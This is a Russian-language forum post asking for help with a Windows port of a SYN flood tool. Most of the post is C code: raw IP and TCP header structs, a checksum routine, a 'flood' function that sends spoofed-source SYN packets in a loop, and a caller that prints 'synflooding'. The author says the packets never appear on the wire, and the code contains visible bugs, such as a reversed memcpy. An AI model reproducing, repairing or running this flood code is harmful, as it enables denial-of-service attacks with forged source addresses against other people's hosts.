Вот в Инете уйма сорсов, в которых явно показывается как обрабатывать syn/ack
Я пробовал все перенести все под win (copiler: msvc++ 6.0) Но там структур типа tcphdr вроде нет.
Я все взял с <linux/ip.h> <linux/tcp.h>
Пробовал отсылать SYN , но в netstat и в tcpdump ничего не видно. Убил пару дней на это все.
Вот код, может кто то и генерировал пакеты.
Сами структуры :
typedef unsigned short int u_int16_t;
typedef unsigned int u_int32_t;
typedef unsigned char u_int8_t;
#define __BYTE_ORDER 1
#define __LITTLE_ENDIAN 1
#define __BIG_ENDIAN 2
struct iphdr
{
#if __BYTE_ORDER == __LITTLE_ENDIAN
unsigned int ihl:4;
unsigned int version:4;
#elif __BYTE_ORDER == __BIG_ENDIAN
unsigned int version:4;
unsigned int ihl:4;
#else
# error "Please fix <bits/endian.h>"
#endif
u_int8_t tos;
u_int16_t tot_len;
u_int16_t id;
u_int16_t frag_off;
u_int8_t ttl;
u_int8_t protocol;
u_int16_t check;
u_int32_t saddr;
u_int32_t daddr;
/*The options start here. */
};
struct tcphdr
{
u_int16_t source;
u_int16_t dest;
u_int32_t seq;
u_int32_t ack_seq;
# if __BYTE_ORDER == __LITTLE_ENDIAN
u_int16_t res1:4;
u_int16_t doff:4;
u_int16_t fin:1;
u_int16_t syn:1;
u_int16_t rst:1;
u_int16_t psh:1;
u_int16_t ack:1;
u_int16_t urg:1;
u_int16_t res2:2;
# elif __BYTE_ORDER == __BIG_ENDIAN
u_int16_t doff:4;
u_int16_t res1:4;
u_int16_t res2:2;
u_int16_t urg:1;
u_int16_t ack:1;
u_int16_t psh:1;
u_int16_t rst:1;
u_int16_t syn:1;
u_int16_t fin:1;
# endif
u_int16_t window;
u_int16_t check;
u_int16_t urg_ptr;
};
Проверка контрольной суммы, как извесно для ip и для tcp она одна и та же
unsigned short in_cksum(unsigned short *ptr,int nbytes)
{
register long sum; /* assumes long == 32 bits */
u_short oddbyte;
register u_short answer; /* assumes u_short == 16 bits */
sum = 0;
while (nbytes > 1) {
sum += *ptr++;
nbytes -= 2;
}
/* mop up an odd byte, if necessary */
if (nbytes == 1) {
oddbyte = 0; /* make sure top half is zero */
*((u_char *) &oddbyte) = *(u_char *)ptr; /* one byte only */
sum += oddbyte;
}
sum = (sum >> 16) + (sum & 0xffff); /* add high-16 to low-16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* ones-complement, then truncate to 16 bits */
return(answer);
}
Сама функция флуда :
void flood(int sock,unsigned sadd,unsigned dadd,unsigned short dport,int amount)
{
struct packet{
struct iphdr ip;
struct tcphdr tcp;
}packet;
struct pseudo_header{
unsigned int source_address;
unsigned int dest_address;
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
struct tcphdr tcp;
}pseudo_header;
struct sockaddr_in sin; /* IP address information */
register int i=0,j=0; /* Counters */
int tsunami=0; /* flag */
unsigned short sport= 7624;
sin.sin_family=AF_INET; /* Internet address family */
sin.sin_port=sport; /* Source port */
sin.sin_addr.s_addr=dadd; /* Dest. address */
/* Fill in all the TCP header information */
packet.tcp.source=sport; /* 16-bit Source port number */
packet.tcp.dest=htons(dport); /* 16-bit Destination port */
packet.tcp.seq=getrandom(10000,40000); /* 32-bit Sequence Number */
packet.tcp.ack_seq=0; /* 32-bit Acknowledgement Number */
packet.tcp.doff=5; /* Data offset */
packet.tcp.res1=0; /* reserved */
packet.tcp.res2=0; /* reserved */
packet.tcp.urg=0; /* Urgent offset valid flag */
packet.tcp.ack=0; /* Acknowledgement field valid flag */
packet.tcp.psh=0; /* Push flag */
packet.tcp.rst=0; /* Reset flag */
packet.tcp.syn=1; /* Synchronize sequence numbers flag */
packet.tcp.fin=0; /* Finish sending flag */
packet.tcp.window=htons(242); /* 16-bit Window size */
packet.tcp.check=0; /* 16-bit checksum (to be filled in below) */
packet.tcp.urg_ptr=0; /* 16-bit urgent offset */
/* Fill in all the IP header information */
packet.ip.version=4; /* 4-bit Version */
packet.ip.ihl=5; /* 4-bit Header Length */
packet.ip.tos=0; /* 8-bit Type of service */
packet.ip.tot_len=htons(40); /* 16-bit Total length */
packet.ip.id=getrandom(4000,9999); /* 16-bit ID field */
packet.ip.frag_off=0; /* 13-bit Fragment offset */
packet.ip.ttl=38; /* 8-bit Time To Live */
packet.ip.protocol=IPPROTO_TCP; /* 8-bit Protocol */
packet.ip.check=0; /* 16-bit Header checksum (filled in below) */
packet.ip.saddr=sadd; /* 32-bit Source Address */
packet.ip.daddr=dadd; /* 32-bit Destination Address */
/* Psuedo-headers needed for TCP hdr checksum (they
do not change and do not need to be in the loop) */
pseudo_header.source_address=packet.ip.saddr;
pseudo_header.dest_address=packet.ip.daddr;
pseudo_header.placeholder=0;
pseudo_header.protocol=IPPROTO_TCP;
pseudo_header.tcp_length=htons(20);
for(i=0;i<amount;i++)
{
packet.tcp.source++; /* Source port inc */
packet.tcp.seq++; /* Sequence Number inc */
packet.tcp.check=0; /* Checksum will need to change */
packet.ip.id++; /* ID number */
packet.ip.check=0; /* Checksum will need to change */
packet.ip.check=in_cksum((unsigned short *)&packet.ip,20);
memcpy((char *)&packet.tcp,(char *)&pseudo_header.tcp,20);
packet.tcp.check=in_cksum((unsigned short *)&pseudo_header,32);
int sent = sendto(sock,(char*)&packet,40,0,(struct sockaddr *)&sin,sizeof(sin));
printf("Sent %i\n",sent);
::Sleep(500);
}
}
Вызов функции :
srchost = inet_addr(argv[1]);
dsthost = inet_addr(argv[2]);
port = atoi(argv[3]);
number = atoi(argv[4]);
printf("synflooding %s from %s port %u %u times\n", argv[2], argv[1], port, number);
int rawsock = socket (AF_INET, SOCK_RAW, RAW);
setsockopt (rawsock, IP, IP_HDRINCL, "1", sizeof ("1"));
flood(rawsock, srchost, dsthost, port, number);
Вот оно мне принтит что отправил 40 байт, но ни в netstat ни в tcpdump я этого не вижу
thanx
